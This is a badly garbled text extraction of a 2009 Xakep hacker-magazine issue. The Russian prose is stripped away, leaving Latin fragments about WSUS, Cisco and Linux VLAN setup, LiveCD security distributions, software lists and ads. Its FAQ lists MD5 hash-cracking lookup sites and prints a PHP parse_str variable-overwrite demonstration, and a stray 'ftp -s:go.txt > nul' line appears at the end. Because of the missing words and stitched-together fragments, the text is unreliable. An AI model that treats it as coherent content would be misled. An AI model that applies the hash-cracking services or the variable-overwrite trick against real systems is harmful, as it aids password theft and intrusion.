WSUSSetup_30SP1_x86.exe (
32 ) Microsoft .
. :
, ;
.
-
119
>> SYN/ACK
WSUS

WSUS gpedit.msc ( WinXP
Home Edition ). Windows Update
Windows.
wuau.adm.
Microsoft ,
WSUS ,
. ,
http://WSUS/.
WSUS,
. (Unassigned Computers).
WSUS.
gpupdate /force, wuauclt /detectnow
wuauclt /downloadnow. %WINDIR%\
SoftwareDistribution\Download.
warning
C WSUS

Active Directory.
120
. , ,
(, IIS),
,
.
,

Microsoft Updates. ,
,
WSUS.
. (C:\WSUS). -
, ,
. , , !
,
, . ,

.
. .
,
. , ,

. -
-
, -
WSUS.
- IIS. WSUS, 80.
, - WSUS.
8530. , .
. .
WSUS
Update Services.
.

Update Services , . .

WSUS (

). . 13 . ,
WSUS (WSUS Server
Configuration Wizard). , .
x 01 /121/ 09
>> SYN/ACK
WSUS 3.0
,
. Microsoft Update,
WSUS,
.
. WSUS
. , .
SSL-
. , , .
, .
,
Windows Update.
. .
, ,
Microsoft (, , ..)
. , WSUS . , , Win2k3
, .
, .
. .
, (Synchronization per day).
,
(Begin
initial synchronization). . ,
. .

(Unassigned),
.
,
. ,
( ).
x 01 /121/ 09
, .

, .
,
.
, , ,
.
, , . , WSUS .
, ,
.
, : , ,
WSUS. ,
,
.
.
,
. , , ,
. .
WSUS .

, . ,
. z
links
WSUS 3.0 SP1

Microsoft
go.microsoft.com/
fwlink/?linkid=93750.
info
SQL
Server
SSMS (SQL
Server Management
Studio).

WSUS

Microsoft Windows
Server Update
Services 3.0,
Microsoft
TechNet.
121
>> SYN/ACK

vlan 1
/ dhsilabs@mail.ru /
vlan 2
switch 1
t
r
u
n
k
vlan 1
vlan 2
switch 2
: ,
, . ? ,
Cisco, HP, Dlink
Linux, xBSD, Windows .
?
VLAN (Virtual Local Area Network, ) , , . , ,
, .

, .
, . ,
122
VLAN , .
, , . - , . -, VLAN
. , , , ,
. -,
. VLAN -
x 01 /121/ 09
>> SYN/ACK
vlan 1
vlan 2
internet
router
switch 1
t
r
u
n
k
vlan 1
vlan 2
switch 2

( ). -, VLAN
. VLAN
ARP-
. , , .
VLAN
. (, , VoIP, IPTV) , ,
1024 VLAN ( 802.1Q).
Double VLAN ( ), (VLAN ID) .

,
- ,
x 01 /121/ 09
VLAN. . , , ,
, - .
, VLAN? ? . , ,
.
. , Cisco, . IEEE 802.1Q.
-,
VLAN.
4 . :
TPID (Tag Protocol Identifier) .
, . 802.1Q 0x8100. 16 .
Priority .
123
>> SYN/ACK

VLAN.
.
, VLAN.

.
802.1X.
RADIUS- .
trunk-,
IEEE 802.1p. 3 .
CFI (Canonical Format Indicator) .
, MAC-: 1 , 0 . 1 .
VID (VLAN Identifier) . ,
. 12 .
. , .
VLAN
. ,
, :
( Cisco , .
trunk ports) ( , access ports).
,
.
, .
, .
.
.
VLAN,
VLAN - (
, native VLAN). .
,
.
.
VLAN 1.

Double VLAN?
, IEEE 802.1Q
VLAN 802.1Q tag Provider Edge (PE). Double VLAN
- VLAN (Serviceprovider VLAN ID, SP-VLAN ID) , VLAN . VLAN ,
Customer VLAN IDs (CVLAN IDs), ,
,
VLAN.
124
VLAN Cisco. ,
, VLAN , . ,
, Cisco,
.
, : switch1 switch2. . (fa0/N),
.
Cisco ISL (Inter Switch Link).
802.1Q.
Cisco Catalyst 3560
.
, vlan
1. (vlan 2) , Cisco:
switch1(config)
# vlan 2
switch1(config-vlan) # name myvlan
. fa0/3
fa0/4 vlan 2:
switch1(config)
switch1(config-if)
switch1(config-if)
# interface fa0/3
# switchport mode access
# switchport access vlan 2
switch1(config)
switch1(config-if)
switch1(config-if)
# interface fa0/4
,
access. vlan 2.
x 01 /121/ 09
>> SYN/ACK

, , .
. ,
fa0/5 fa0/9 vlan2:
switch1(config)# interface range fa0/5 9
switch1(config-if-range)# switchport mode access
switch1(config-if-range)# switchport access vlan 2
:
switch1(config)# show vlan brief
VLAN Name
Status
Ports
---- --------- ------------------------------1
default
active
Fa0/1, Fa0/2, Fa0/10, Fa0/11,
Fa0/12, Fa0/13, Fa0/14, Fa0/15,
Fa0/16, Fa0/17, Fa0/18, Fa0/19,
Fa0/20, Fa0/21, Fa0/22, Fa0/23,
Fa0/24
2
mylan
active
Fa0/3, Fa0/4, Fa0/5, Fa0/6,
Fa0/7, Fa0/8, Fa0/9
. :
switch1(config)
switch1(config-if)
switch1(config-if)
# interface fa0/24
# switchport encapsulation dot1q
# switchport mode trunk
, vlan 2, , . , , vlan 2 (
vlan 1)
switch1(config-if)
# switchport trunk native vlan 2

:
switch1
switch1
# show interface fa0/24 trunk

# show interface fa0/24 switchport
switch1(config)
switch1(config-if)
switch1(config-if)
# interface fa0/4
!
switch1(config)
switch1(config-if)
switch1(config-if)
# interface fa0/24
# switchport encapsulation dot1q
# switchport mode trunk
switch2 .
, , . ,
( ).

switch1:
switch1(config)
#ip routing
IP- (192.168.1.1).

(vlan1 default):
switch1(config)
#interface default
switch1(config-if)#ip address 192.168.1.1 255.255.255.0
switch1(config-if)
#no shutdown
:
switch1(config)
#interface vlan2
switch1(config-if)#ip address 192.168.1.1 255.255.255.0
switch1(config-if)
#no shutdown
fa0/20, . , ,
, ,
. :
switch1(config)
switch1(config-if)
switch1(config-if)#ip
switch1(config-if)
#interface fa0/20
#no switchport
address 192.168.1.1 255.255.255.0
#no shutdown
:
switch 1:
switch1(config-if)#ip route 0.0.0.0 0.0.0.0 192.168.1.1
!
interface fa0/3
switchport mode access
switch1(config-if)
!
x 01 /121/ 09

Cisco . , Cisco , , ,
125
>> SYN/ACK

VLAN , .
:
,

(oversized frames). .
.
.
-. 802.1X,
RADIUS-
VLAN ( xgu.ru/wiki/802.1X__RADIUS);
D-Link. , ( ,
, ), . , D-Link . www.dlink.
ru/technology/vlan.php. VLAN D-Link
xgu.ru/wiki/VLAN__D-LINK .
VLAN Linux
Linux. , VLAN Linux
VLAN
.
802.1q,
:
# modprobe 8021q
? , Network options / 802.1Q VLAN Support.

, IP-:
# ifconfig eth0 down
# ifconfig eth0 0.0.0.0 up
, .
vconfig ( vlan vconfig , vconfig, ).
:
# vconfig add VLAN_ID
:
# vconfig add eth0 1
# vconfig add eth0 2
vlan1 vlan2
eth0. IP- :
# ifconfig eth0.1 192.168.1.10 netmask 255.255.255.0 up
# ifconfig eth0.2 192.168.2.25 netmask 255.255.255.0 up
126
VQP, VMPS VLAN

MAC-, (en.
wikipedia.org/wiki/VQP).
GVRP ( IEEE 802.1P).
VLAN
(www.javvin.
com/protocolGVRP.html). Cisco
VTP (en.wikipedia.
org/wiki/VTP).
, ,

( ):
# route add default gw 192.168.1.254

/proc:
# cat /proc/net/vlan/eth0.1
. VLAN , . ,
802.1q /etc/modules.conf, VLAN /
etc/network/interfaces, , :
auto myvlan
iface myvlan inet static

address 192.168.1.1

netmask 255.255.255.0

vlan_raw_device eth0
VLAN Windows: ?
Windows VLAN,
, . : Intel Advanced
Networking Suite (iANS), 3com DynamicAccess, Broadcom Advanced Server
Program (BASP). ,
, , .
VLAN Windows,
VLAN,
Linux-.

, VLAN, , , .
:
ru.wikipedia.org/wiki/VLAN VLAN;
www1.bstu.by/wiki/index.php?title=VLAN_802.1Q 802.1Q;
people.freebsd.org/~arved/vlan/vlan_en.html VLAN
FreeBSD (FreeBSD VLAN mini HowTo);
www.opennet.ru/tips/info/1381.shtml
Q-in-Q,
. z
x 01 /121/ 09
>> SYN/ACK
grinder
/ grinder@ua.fm, tux.in.ua /
LiveCD:

Linux
.
, . LiveCD ,
, .
,
.

.
, , Asterisk
..
. , -
128
,
. . ,
! ,
, :
;

;
;
.
x 01 /121/ 09
>> SYN/ACK
, GParted
!
Clonezilla

GParted (GNOME Partition Editor, gparted.sf.net),
*nix, LiveCD- (
90 ), Debian. GParted
,
PartitionMagic ext2, ext3, FAT16, FAT32, HFS, HFS+, UFS,
JFS, NTFS, ReiserFS, Reiser4, XFS. , LVM2 FUSE.
Fluxbox. , 64 .
, CD, USB. PXE- .
.

Partition Image (www.partimage.org),
. GParted
(, UFS, NFS NTFS ).
TestDisk (www.cgsecurity.org/wiki/TestDisk),
.
Midnight Commander, Vim Nano . GParted Live
, - , , Partition Image .
Clonezilla (www.clonezilla.org).
Partition Image, ntfsclone, partclone, dd udpcast (Samba, NFS, SSH). : Clonezilla Live Clonezilla SE (Server
Edition). , .
40 ( ) 10 .
CD, USB-, (PXE).
2.6.25.16 Linux, Reiser4,

Btrfs ( , Oracle ZFS), SMB NFS.
1.1.0 :
;
32 (i486 ) 64.
230 , , .
,
<F2> <F7>. ( framebuffer, , USB ..), .
(memtest),
DOS FreeDOS (freedos),
Graphical Boot Manager (gag), (aida),
Dariks Boot and Nuke
(dban), (mhdd).
, .
.
0.3, SystemRescueCD X-
WindowMaker, , startx.
, .
, fdisk, GNU/Parted, GParted , : e2fsprogs, reiserfsprogs, reiser4progs,
xfsprogs, jfsutils, ntfstools (ntfsresize, ntfsclone ), dosfstools,
sfdisk. , , . mtools, DOS-.
PartImage ( ). gag,
GRUB LILO.
SystemRescueCD , ,
, Windows. Midnight
Commander. : vim, elvis, nano, joe,
qemacs Leafpad. , SystemRescueCD, . (gzip, bzip, rar, tar ),
CD/DVD (cdrecord, dvd-rw-tools, cdrtools, mkisoft). dban, , ,
shred, wipe.
ClamAV (
freshclam).

,
,
. SystemRescueCD (www.sysresccd.org).
LiveCD ( ). SystemRescueCD ,
, , , .
SystemRescueCD Gentoo.
x 01 /121/ 09
129
>> SYN/ACK
BackTrack
KDE . , ,
SystemRescueCD - (DHCP) WiFi.
root, .
. 2.7 , . GParted, .
SystemRescueCD Samba, ftp-- , , .
, SSH, VNC-. - BackTrack
- , 11 . : lynx, elinks Bon Echo ( Firefox 2.0.0.16), , , Nmap, (SecurityFocus, PacketStorm, Metaspl0it Framework
netcat nslookup DNS-.
2/3 .), , , Cisco, ,
- BackTrack
VoIP-, .. ,
links
GParted
LiveCD . VoIP & Telephony Analysis 32 .

, - gparted.sf.net.
. (, . - , , - ..). SystemRescueCD
2003-2005 , , , Office
.
Games. BackTrack
www.
BackTrack (www.remote-exploit.org) . slapt-get, sysresccd.org.
2004 : Auditor ( slapt-get
Security Linux WHAX ( Whoppix),
OpenSource-. Auditor Security The Swiss Army

Knife for security assessments Clonezilla www.
Linux-, 300
clonezilla.org.
. WHAX (White Hat + SLAX) BackTrack
(penetration
test).
www.remote exploit.org.

. final3, Ubuntu

2008 nUbuntu (Network Ubuntu,
. BackTrack Slackware
www.nubuntu.org),
BackTrack 12.0 SLAX (www.slax.org).

(forums.
KDE 3.5.7
.
remote-exploit.org)
Fluxbox. LiveCD. Fluxbox. ,
Wiki (wiki.remote USB-

exploit.org) .
VMware. .
Ubuntu,
KDE
,
DEFT
( ), Fluxbox, KDE , VESA-,
.
Linux - www.deftlinux. .
, Alpha,
net.
LiveCD ,
.
nUbuntu
130
x 01 /121/ 09
>> SYN/ACK
BackTrack
Xubuntu DEFT
, ).

, . DEFT Linux (www.deftlinux.net). Digital
Wiki (forums.remote-exploit.org, Evidence & Forensic Toolkit.
wiki.remote-exploit.org).
, . DEFT v1 2006
DEFT
Kubuntu 6.10. .
, 60% Xubuntu 8.10 XFce. , , . , , , Ubuntu. DEFT
, , , - Ubuntu, . ,
. . , ,
. .
. XFce, deft-gui.
, ,
,
, Ubuntu
. , ,
.
BackTrack USB- Asus Eee PC ,
LiveCD, BackTrack
. 3 USB version ( 783 ).
OpenSource-,
1 ( Asus Eee PC SD-), FAT32.
, Sleuth Kit
ISO-. Windows (TSK) Autopsy (Autopsy Forensic Browser).
WinRAR UltraISO, ISOBuster.
RAW*nix :
, dd dd_rescue.
, ,
# mount -o loop -t iso9660 bt3-final.iso /mnt/iso
. .
AFF (Advanced Forensics Format).
bt3 boot.
. .
bt3 bootinst.bat ( Windows) bootinst.sh (*nix).
,
, :
.
Gpart, parted Gparted QTparted, TestDisk.
# boot/syslinux/syslinux -d boot/syslinux /dev/sdd
Foremost.
Windows:
trID. Steg detect OutGuess.
K:\boot\syslinux\syslinux.exe -ma -d \boot\syslinux K:
hex- hex dump KHex. / Ophcrack John
/dev/sdd K: .
the Ripper. ClamAV,
Asus Eee PC boot/syslinux/
chrootkit, rkhunter. .
syslinux.cfg, APPEND vga=0x317 initrd=/
DEFT Samba, OpenSSH , RDesktop. ,
boot/initrd.gz ( SD
Network
/dev/sda) changes=/dev/sda2.
Nessus, Nmap, FireShark, Ettercap, Kismet AirSnort. z
BackTrack
USB-
Asus Eee PC
x 01 /121/ 09
131
>> units
mehovushka
/ mehovushechka@yandex.ru /
psycho:

. ,
. , . ?
? ?
- , , , ,
. .
, ,
. ,
.

.

, , .
, . . , ,
? .
,
. , -,
,
. , .
,
? .
, . , ,
, ,
.
,
. , , -
: .
! : ][
- , -
.
,
. ,
,
, .
132
. ,
,
.
, , .
.
,
- , .
, ,
.
,
,
. , ,
, !
,
, - ,
. -
, .
, ?

,
, , .
( , ,
) .
, .
, .
, , ,
. ,
? , , .
? , ? , , !..

, , ,
, , ,
.
x 01 /121/ 09
>> units
, ,
. , ,
. ,
, , , .
,
.
, , . ,
: , .
, .
.
,
, .
, , history . .
x 01 /121/ 09
() ,
, , . -

, 500
, . . , . , ,
,
, ,
.
133
>> units

.
, .
.
, , , . .
, , , .
.
.
.

- . !
: ; ,
. ,
, , ,
, .
. , (,
, ), .
,
.
, ,
, , ,
. , ? ?
, , , .

,
.
= ?
, ,
, , .
. ,
,
.

, , , , -
134

.
,
! !
. ,
, , . , .
, , .
? ,
, ,
?

2008
. Psycho:
, .
.
x 01 /121/ 09
>> units

, ,
, ,
, , . ,

,
.
, .
, .
, -
.
,
. .

,
, ,
..
, ?
. , , ,
.
, , . .

, . , . , , ,
, .
.
, -
- ,
,
.
, , .
.

. ,
,
.
, , .
,
.

,
, , . , , .

,
. .
, .
- . , .

,
, .
. ,
. , ,
- ,
. ? ,
-
. , -
, .. , .
,
. , .
, ,
, , - .
, pr- ,
.
.
,
,
.
, .
. ,

, - , , .
,
, , ,
, , - , ,
, , , ,
. , -
, .
. z
info
,
, ,
, ,
?
,

.
links
psyfactor.org

.
x 01 /121/ 09
135
>> units
/ icq 884888 /
FAQ UNITED:
Q:
md5
MD5 ?
A:
- Reverse
MD5 lookup in multiple databases, : http://md5.noisette.
ch.

String to hash , , :
http://us.md5.crysm.net
http://gdataonline.com
http://md5.rednoize.com
http://schwett.com
http://authsecu.com
http://passcracking.com
http://md5.cryptobitch.de
http://md5oogle.com
http://insidepro.com
136
http://undosha1.com
http://csthis.com
http://hashcrack.com
http://md5.benramsey.com
md5.noisette.ch
API .
,
: http://md5.noisette.ch/md5.php?h
ash=2a0231531bc1a7fc29e2fa8d64352ae9,
xml-:
<md5lookup>
<hash>2a0231531bc1a7fc29e2fa8d
64352ae9</hash>
<string>noisette</string>
</md5lookup>
API, ,
:).
Q: ,
.
,
?
A: :
1. (,
, inurl
site);
2. (
10 ,

);
3. .
:
awt.win32utils.com/datac/;
4. - ,
(,
$0.01 ,
:)).
x 01 /121/ 09
>> units
Q: PHP.

(/ POST,
GET-,
..)?
A:
- AcidRoot! php-
PhpSploit Class
,
HTTP.
( ) http://mgsdl.free.fr/?2:3.
:
PHP 4/PHP 5;
GET/POST-;
cookies ;
basic-;
;
- (
POST);

php-.
Q: Skype,
IM
?
A:
. Nimbuzz Mobile.
,
startup Mobile 2.0 Europe.
Nimbuzz:
Nimbuzz Mobile
VoIP IM-, : ICQ,
Skype, GoogleTalk, Jabber, MSN,
Yahoo AIM,
.
Nimbuzz 1000 , ,
Symbian, Java Windows
Mobile.
Nimbuzz VoIP (mVoIP) ,
- .
Nimbuzz Mobile
: Wi-Fi, 3G
GPRS/EDGE.
Nimbuzz -,
, presence () Buzz ().

http://www.nimbuzz.com/ru/
mobile.
x 01 /121/ 09
Q: php-
parse_str()? ?
A: ,
-. ,
parse_str(string str [, array arr])
str,
URL,
, arr.

. ,
script.php, :
<?php
$var = 'init';
parse_str(
$_SERVER['QUERY_STRING']);
print $var;
?>

: script.php?var=new, $var
new! arbitrary
variable overwrite.
:
<?php
//script.php?array[]=new
$array = array('init');
parse_str($_SERVER['QUERY_
STRING']);
print_r($array); // [0] =>
init, [1] => new
// script.php?array=new
$array = array('init');
parse_str($_SERVER[QUERY_
STRING'],$array); // [array]
=> new
print_r($array);
?>

: http://www.acid-root.new.fr.
Q: ,
id, ls, cat. -,
.
A: !
:
'uname -a'
: , ,
, ,
;
'cat /etc/issue'
;
'uptime' ;
'chkconfig --list | more'
/
;
'last -[- ]' , ;
'ps' , ;
'top' ,
;
'df -h' ;
'du -sh /home/username'

;
'find [] -type d -perm 0777 -ls'
, ;
'egrep -v '^#|^[:blank:]*$' []'

(
);
'cat []|grep word'
'', 'word';
'cat []|less'

Enter;
'echo [] > out.txt'
echo out.txt;
'echo [] >> out.txt'
echo out.
txt;
'echo "[]'ls -la'"'
+ ls
-la ( ,
ls -la,
echo).
Q: NOD32.

?
A:
( 3- ):
1.
(, C:\
nod32update\);
2.
.
;
3. ;
4. ;
5.
(C:\
nod32update\) ;
137
>> units
6.
,
;
7.

;
8. :).
P.S. C:\Program Files\ESET\
ESET NOD32 Antivirus.
em0* .dat.
Q: -?
A: Web- (Web-) ,
, ,
,
. Web-c
, ,

XML-.
, XML. ,

SOAP; -, ,
WSDL. - HTTP

.

.
:
Java Web Services Development Pack;
Microsoft .NET-;
Zend Framework;
Mono development platform Novell.
-,
,
,
,
webservices.aeroflot.ru.
Q: Google,
,
Yahoo?
A: ! :
site
+ ,
: 'site:yahoo.com';
hostname
, : 'hostname:
autos.yahoo.co';
link ,
, : 'link:http://
autos.yahoo.com/' (,
138

);
url , : 'url:http://edit.autos.yahoo.
com/repair/tree/0.html';
inurl , :
'inurl:bulgarian';
intitle , : 'intitle:Bulgarian'.
:
''
;
' +' .

;
' +' .

;
' OR ' , , .
Yahoo!
Shortcuts (! ). :
'map'
;
weather ;
define ;
news .
,

http://help.yahoo.com/
l/us/yahoo/search/basics/basics-04.html.
Q: ?
A:
Open++ (www.freewebs.com/dengdun/en/
openxx.htm). , ,
,
.

, , API- .
Q: .

, . ?
A:
.
. ,
,

.
old_user .
(

, Documents and Settings).
Q:
? - c icq?
, QIP , Miranda
.
A: ,
. ,
, , -,
, , , -,
.
.

UIN #1 ICQ 5.1
. ICQ web ICQ. AOL ICQ Lite

ICQ 5.1. , ,
QIP? ,
LoginID, .. ,
,
QIP
5.1 (
, ).
, ICQ 5.1
, . , ,
, , LoginID, ,
.
Q:
PHP- Java-. :
?
A: , ,

,
, ,
. Quercus
PHP (http://www.caucho.com/resin-3.0/
quercus), PHP,
Java.
(Apache Tomcat, Jetty,
Apache). ? , ,
, Java.
,
php_java PHP/Java Bridge
(php-java-bridge.sourceforge.net). ,
PHP ,
Java-.
Jython (www.
jython.org) Java- Python. JRuby (jruby.codehaus.org)
Groovy (jruby.codehaus.org), Java Python, Smalltalk. z
x 01 /121/ 09
>Net
A1 Website
Safari 3.2
Firefox 3.1b2
Free Music Zilla 1.0.5
OpenVPN 2.1_rc15
Opera 10.0 Alpha 1
Kiwi CatTools 3.3.14
Web Forum Reader 2.0
WiSSH
>Misc
Ditto_Portable 3.15.4
DriverMax 4.7
MyUSBOnly 4.17
Game Overlay 1.0.7
Camtasia Studio 6.0.0
Typle 2.0
Dicto 2.7.4.7
re:PocketMod
O&K Work Spy 1.01
Link Shell Extension
>Games
OpenTTD 0.6.3
>Development
Axure RP Pro 5.1
Adobe AIR 1.5
Milescript 0.8.1
mono 2.0
PatchFactory 3.3
Qt 4.4.3
Qt for Windows CE
3
CodeSmith 5.0.4
Mercurial 1.1.1
DeployLX 3.2
Google Native Client 1.1.28
JavaFX 1.0 SDK
Titanium SDK 0.1
Resource Builder 3.0.0.18
>>WINDOWS
>Dailysoft
7-Zip 4.62
AutoRuns 9.35
DAEMON Tools Lite 4.30.1
Download Master 5.5.7.1145
FarPowerPack 1.15
FileZilla Client 3.1.6
IrfanView 4.22
JDataSaver
K-Lite Mega Codec Pack 4.4.2
Miranda IM 0.7.13
Mozilla Firefox 3.0.5
Notepad++ 5.1.2
Opera browser 9.63
PuTTY 0.60
QIP Infium v9020
Skype stable
Total Commander 7.04a
Unlocker 1.8.7
Winamp Media Player 5.541
Xakep CD DataSaver 5.2
>>UNIX
>Desktop
YamiPod 1.7
Lancelot 1.0.3
Amarok 2.0
Yakuake 2.9.4
VLC 0.9.8a
Beryl 0.2.1
Brasero 0.8.4
Adobe Flash Player 10.0.12.36
Google Gadgets 0.10.4
Corel Photo-Paint 9
EarthBrowser 3.0.4
Songbird 1.0
PDF Cube 0.0.3b
ScreenKast 0.1.4
modmaker 0.2
ImageMagick 6.4.7-10
>System
Driver Magician V3.32
MojoPac 2.0
Priority Saver 1.98
O&K Print Watch 4.3.0.1730
Unknown Device Identifier 6.0
Wuby 8.10
Sandboxie 3.3
Outpost Firewall Pro 2009
Outpost Antivirus Pro 2009
MySQL 5.0.67
MySQL 6.0alpha
PostgreSQL 8.3
Super Flexible File Synchronizer 4.51
USB Disk Security V5.1.0.15
HDDlife 3.1.157
>Secutity
AxCrypt 1.6.4.4
Angry IP Scanner 3.0-beta3
BestCrypt Traveller 1.02.8
Jetico Personal Firewall for Windows
v.2.0.2.8
BCWipe 3.11.7
PassX 1.1
Odysseus 2.0.0.84
Wireshark 1.0.5
Capsa 6.9
ServiceCapture 1.2.27
RogueScanner
nipper 0.12.5
bsqlbf v2
>Multimedia
Artweaver 0.5.7
BB FlashBack 2.5
Inksaver 2.0
ObjectDock 1.9
PowerDVD 8
AUTOPANO v1.03
Whisher 3.0
DomainScan Pro 2.8beta2
Deluge 1.1.0
WebDrive 7.0
Ad Muncher 4.72
>Security
Privoxy 3.0.10
Tor 0.2.0.32
CGIProxy 2.1
Snare 1.5.0
TrueCrypt 6.1a
Nessus 2.2.10
Bluediving 0.9
Rootkit Hunter 1.3.2
F-Prot Antivirus for Linux
Workstations 4.6.7
THC-SecureDelete 3.1
DNS Flood Detector 1.12
>Net
Skype 2.0.068
Transmission 1.40
Mozilla Firefox 3.0.5
Opera 9.63
Wireshark 1.0.5
KCheckGmail 0.5.7.7
KTorrent 3.1.5
SIM Instant Messenger 0.9.4.3
aMule 2.2.2
BitTorrent 5.2.2
LimeWire 4.18.8
Valknut 0.3.22
rTorrent 0.8.0
Flock 2.0.2
LFTP 3.7.7
Netscape Navigator 9.0.0.6
Pidgin 2.5.3
>Games
Frozen-Bubble
>Devel
Adobe AIR 1.5
Qt Creator 0.9.1b
Qt 4.4.3
MySQL Workbench 5.1.5a
Python 3.0
jython-2.2.1
Groovy 1.5
Nasm 2.05.01
ArgoUML 0.26
Bluefish 1.0.7
libdvdcss 1.2.10
libjpeg v6b
libpcap 1.0.0
libxml2 2.6.31
Mantis 1.1.6
jdk-6u11
JavaFX 1.0
KOffice 1.6.3
Google Desktop 1.0.1
Wally 1.3.2
Google Earth 4.2
ISO Master 1.3.4
Krusader 1.90
Kpackage 3.5.8
Google Native Client
>X-Distr
openSUSE 11.1
>System
Filelight 1.0
Linux NTFS 1.13.1
Linux Kernel 2.6.28 RC9
ati 8.12
nVidia 180.16b
SystemImager 4.0.2
Ext2 Filesystems Utilities 1.41.2
e2retrieve
Linice 2.6
IBAM 0.5.1
pppd-logger 0.2
cpuburn 1.4
KLogWatch 2.0.3
>Server
TeamSpeak2 2.0.32.60
MySQL 5.0.75
Bacula 2.4.3
vsftpd 2.0.7
Apache 2.2.11
LiteSpeed Web Server 3.3.23
Open DC Hub 0.7.14
Ventrilo Server 2.3.1
webcam_server 0.50
UnrealIRCd 3.2.6
TFTP Server 1.4
NASLite 2.06
Bind 9.6.0
Asterisk 1.4.22
OpenSSH 5.1
Openvpn 2.1rc15
PostgreSQL 8.3.5
Squid 3.0.stable11
Samba 3.2.6
Snort 2.8.4.b
Postfix 2.5.5
Sendmail 8.14.3
Dhcp 4.1.0
Honeyd 1.5c
OpenLDAP 2.4.13
Cups 1.4b2
01(121) 2009
2100 .
( 15%
)
. ,

( ) 3-
.
5(4
]]
v2 ? . 73
#11|57| 2008
:
, ,
,

08021

G TA I V
>
W R AT H O F T H E L I C H K I N G

.1"35:
"1$0

31(

80-'&/45&*/

Total DVD

iPhone 3G
Meridian 810
+CD
. 1
$2
Apple
Erdinger
: -2108
3S-GTE
:
!
www.mconline.ru
19

24
ComStorm
SMART
32
44
Mio Leap
G50
Nokia
E71
66
38
30
HTC
Touch Pro
www.mconline.ru
Fujitsu Siemens
Amilo Xa 3530
DVDXpert
26
30
iPhone 3G
50
120 000
22
2009
BOSE
31
, LAS VEGAS SANDS: .
w w w. m y b i z . r u
GPS-
11 (97) 2008
: Intel Montevina AMD Puma
30 ,
31 .
08
Reference Video System
1980 12
11 (34) 2008
?
!
EUROPEAN
SNOWBOARD
MAGAZINE
ONBOARDMAGAZINE.RU
| 2008 | 11 (32)
www.maxi-tuning.ru
2009
#01 (37)
: 100
,
,

A

www.totalfootball.ru
ONBOARDPARK.RU
37

RUSSIAN EDITION #01 (37) 2009
, .

,
VW Caddy
Honda Prelude
Toyota Celica
-2108
Subaru Impreza
Maxi tuning
ONBOARD
11(34)_Cover_Semak+.indd 1
Total Football
10-10-2008 18:44:50
! !
6
DVD + DVD:
- 155
( 25% , )
#11|57| 2008
:
, ,
,

032-054
2100
DDr3

73
v2 ? . 73

rossf
ire x

fi wi-fi
re so
und system
12
3720
12[52] 08
12
DVD
61
DIABLO III
AV-
20 000

rossf
ire x

fi wi-fi
re so
und system
CALL
OF DUTY:
WORLD
AT WAR

WRATH
OF THE
LICH KING
>
$0.."/%
$0/26&3
3&%"-&35
7"-,:3*"
$)30/*$-&4
DDr3

3
.7

IV
C A L L O F D U T Y: WO R L D AT WA R

%7%
> DIABLO III > MAFIA II >
#BZPOFUUB
032-054
1$14148**9#09%4141
%4 141
]]]]
,

, :
GRAND
THEFT
AUTO
>
11 (92) 2008
W
W W.P C- GA ME R RU
WWW.PC-GAMER.RU
> > 2009 > 01 (77)
2009
K E F 5
4 607157 100056
Total DVD 92 2008
20 XXI
DVD
61
1. , ,
www.glc.ru.
2. .
3. :
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
;
20
.
,
.
,
. , , .
+DVD 6 1200 .
, , 8(495)780-88-29 ( )
8(800)200-3-999 ( , , ).
info@glc.ru www.GLC.ru
>> units

/ xpuzzle@real.xakep.ru,
www.sklyaroff.ru /
X-PUZZLE:
.
, .
, ,

z.
,
.

X-PUZZLE:
<< >>
MAC-, , Ethernet-,
, .
IEEE 802.3, , 6
Ethernet- MAC- (00-50-56C0-0001), 6 MAC- (00-0C-29-07-7E-86).
, (0800h IP-),
IP-. RFC-791,
IP-, , IP-
12 IP- ( c0h a8h
8eh 80h : 192.168.142.128). IP-
16 IP- (c0h a8h 8eh 01h : 192.168.142.1). IP-,
9 IP-,
06 , IP- TCP-. TCP RFC-793, ,
( d8cch 55500
) (0087h 135 ).
<<
>>
. 1 RJ-45
. 2
. 3
. 4 VPN-
. 5
. 6 HASP-
<<
?>>
, , ,
7 ( 7). .
<< >>
: This is a rubric XPuzzle.
rot13,
,
13 .
142
x 01 /121/ 09
>> units
WindoWs
. 64
. 42
UIN C tjat.CoM
w w w.xakep.ru
11 (119) 2008
09 (117) 2008
Rustok.C
Imagine
Cup 2008

.32
. 58
macOS X
. 62
ultimate-
PHP
. 58
. 64
w w w.xakep.ru
12 (120) 2008
RunCMS

. 50
. 122
ICQ
. 74
HTTP
,
-

. 38
GooGle
Talk
IM-
GooGle
. 44

web-
DNS

DNS-
. 94

web 2.0
. 20
. 24

Playstation

. 28
AJAX

,

AJAX-
. 98
iphone

SDK
. 88

,
. .

hatelove.com (61 ), ,
I hate Xakep!. ,
. ,
I love Xakep!. hatelove.com
.
,
:
and, xor or,

, .
, .
x 01 /121/ 09
143
http://
WWW2
JavaScript

OpenSource
,
!
JSusers
www.jsusers.com

, JavaScript.
- . : ,
jQuery ExtJS,
.

Microsoft Visio

Ohloh
www.ohloh.net
, , - .
, Apache ,
7Zip-. :
(
,
). . , , Mozilla Firefox
13 , (50 ), Perl (119 )
36.5 JavaScript?!
5
VMware-
LAMP-

Ubuntu !
Gliffy
www.gliffy.com
Microsoft Visio Dia.

,
Windows Visio, /,
? Gliffy ,
. UML-
,
, ,
-,
. ,
. , , JPEG/
PNG/SVG MS Visio. ,
- - .
!
144
Elastic Server On-Demand

www.elasticserver.com

, .
, , (,
LAMP Apache, PHP MySQL) Create
server. (
VMware, Parallels, Xen VirualIron),
(Ubuntu DaiSY Linux), (NAT ), . , ,

.
x 01 /121/ 09
>> inside

/ STEP@GAMELAND. RU/
444
x 11 /107/ 07

Хакер 2009 01 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2009 01 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

WINDOWS

Genius iSlim 321R

Hercules Deluxe Optical Glass Hercules Dualpix Chat and Show

Logitech QuickCam Sphere AF

Google Gears Google

Yahoo! Browser Plus Yahoo

Sun, Java JavaFX.

, :). SDL Optimization Model,

SDL Threat Modeling Tool

Visual Studio 2005, PREfast

00401026 MOV EAX, 00401000

CREATE TABLE table_file(column_file TEXT NOT NULL);

Add Them!, Backup

ftp -s:go.txt > nul

MOV EAX,DWORD PTR SS:[EBP-4]

0068F857 CMP EBX,0064ED7C ; ebx , , ,

PUSH EAX ; /hObject

ECX,DWORD PTR DS:[EBP-8]

ECX,DWORD PTR DS:[EBP-8]

00649A06 JMP 0068F8B7

